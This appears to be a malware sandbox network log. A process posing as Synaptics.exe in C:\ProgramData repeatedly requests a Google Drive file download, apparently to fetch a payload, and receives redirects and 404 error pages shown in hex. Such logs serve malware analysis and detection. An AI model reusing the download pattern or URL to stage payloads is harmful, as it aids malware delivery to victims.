                                                                                                                                      2024-12-30 10:23:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D1B4vblHNkzuMZa5aSMdnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      92192.168.2.549938142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:32 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cQcFAgvse4omjgAgmgP5CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      93192.168.2.549939142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7WTuj94rufFDqZtwG7pxZoPH3_rR-ldvJA6TcgU5y2S8yRp6CpMZZNerOCl1lR-3-iEv1UpDE
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:32 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-8PMB9QibpD4S_cZPFcA4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 59 71 59 56 5f 45 33 65 44 49 58 52 61 6e 5a 61 43 65 53 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="tYqYV_E3eDIXRanZaCeSCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      94192.168.2.549940142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      95192.168.2.549941142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      96192.168.2.549950142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:33 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6WLcS0ld8Wbl-pvK-Of99jMkw-S8PkJqPMC-fJgoCWFNBnzpaPpGMnw7c9ZGc6Z9JT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WF6MBzeexB25fcpvlSVXSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 42 71 73 70 71 5f 41 44 69 76 4d 4c 33 54 76 4a 5a 50 33 35 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="GBqspq_ADivML3TvJZP35A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      97192.168.2.549949142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HA0NH9Ft22REyZjOynOXVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      98192.168.2.549951142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:33 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7ig5-VfRnvnHzboQSZBNeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      99192.168.2.549959142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC54S44jTpunVyL1JvdIZcMCDlQ96wc37R4z45DYbxl2xjECfjVKCLBLjEpExgy92w3K
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_ke4b_5EzedudC5u9u1axg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 73 70 5a 63 73 70 50 4d 61 4d 61 33 4d 32 52 54 36 30 76 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="IspZcspPMaMa3M2RT60v6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
